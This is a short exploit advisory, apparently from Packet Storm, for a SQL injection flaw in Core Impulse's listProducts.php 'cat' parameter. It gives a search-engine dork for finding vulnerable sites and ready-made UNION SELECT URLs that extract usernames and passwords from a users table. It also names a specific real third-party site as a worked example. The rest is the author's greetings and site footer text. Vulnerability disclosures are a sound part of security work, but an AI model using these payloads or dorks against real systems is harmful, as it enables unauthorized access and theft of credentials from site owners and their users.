Core Impulse suffers from a SQL injection vulnerability.
6eea4c5f032ea52df4ea5459a7449e53b0fd2615a1c43f38632b1f04f89475d9Core Impulse SQL Injection vulnerability
******************************
Vendor site: www.coreimpulse.com
discovered by: e.wiZz!
Dork: inurl:/products/listProducts.php?cat or inurl:listProducts.php?cat
Exploit:
http://www.somesite.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+username,2,3+FROM+users/
http://www.somesite.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+password,2,3+FROM+users/
Example:
http://www.belgradetradecenter.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+username,2,3+FROM+users/*http://www.belgradetradecenter.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+password,2,3+FROM+users/
My blog: infected.blogger.ba
visit: 50centshost.com/forum
Info:bezveze ovo al et,osjecam se kao noob :D
Thanks 2: big thanks to my friend aluigi(aluigi.freeforums.org),QKrunix,F34r...nekako su mi zanimljivi,hvala i skillpak3ru sto me nasmijava svojim znanjem :D
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed